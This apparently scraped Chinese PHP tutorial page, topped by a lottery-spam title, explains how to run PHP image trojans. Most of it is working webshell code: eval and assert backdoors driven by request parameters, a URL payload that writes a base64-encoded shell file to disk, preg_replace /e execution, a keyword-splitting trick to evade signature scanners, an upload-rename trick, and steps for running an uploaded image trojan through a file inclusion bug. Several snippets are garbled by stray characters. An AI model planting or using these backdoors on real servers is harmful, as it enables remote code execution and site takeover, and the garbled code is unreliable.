http://www.psiic.com

                                                                  【幸运pk10计划】php图片木马怎么运行-PHP问题

                                                                  PHP图片木马的的运行方法

                                                                  1、标准的写法,直接通过eval执行p,hp代码

                                                                  @eval ($_POST['code']);

                                                                  2、动态执行assert生成一个木马文件(隐藏性最好的一种)

                                                                  @$_GET['a']($_GET['code']);

                                                                  3、使用方法:从url中传入下面参数执行后会在当前目录生成一个c.php的文件

                                                                  /index.php?a=assert&code=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

                                                                  a参数为eval时会报错(因为eval不是函数)木马生成失败,为assert时同样报错,但会生成木马。

                                                                  4、使用preg_replace执行代码(里面前面只要用一个的任意字符串就可以,如果不一样的话命令可能会被执行多次)

                                                                  @preg_replace("/re/e", $_POST[['code'], "re");

                                                                  5、把特征码打散

                                                                  session_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'];.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

                                                                  6、重命名任意文件

                                                                  $reg="c"."o"."p"."y";$reg($_FILES['filename']['tmp_name'],$_FILES['filename']['name']);

                                                                  include的漏洞使用方法

                                                                  有时候我们会上传一些图片木马但是却不能执行,这个时候如果有一个include的漏洞,那么图片木马就可以执行啦。

                                                                  如果php代码里有一个include($_GET['controller']) 且还有一个url路径为:/index.php?controller=user,这个看起来就是一)个根据参数包含执行对应控制器的代码,但是如果url路径里的参数改成这样:/index.php?uid=/upload/images/muma.jpg(,这个时候木马就执行啦。

                                                                  以上内容仅供参考!

                                                                  推荐教程:PHP视频教程

                                                                  以上就是php图片木马怎么运行的详细内容,更多请关注php中文网其它相关文章!

                                                                1. 微信
                                                                2. 分享php中文网最新课程二维码相关标签:php 图片木马 运行
                                                                3. 本文原创发布php中文网
                                                                4. 郑重声明:本文版权归原作者所有,转载文章仅为传播更多信息之目的,如作者信息标记有误,请第一时间联系我们修改或删除,多谢。

                                                                  上一篇:没有了
                                                                  下一篇:没有了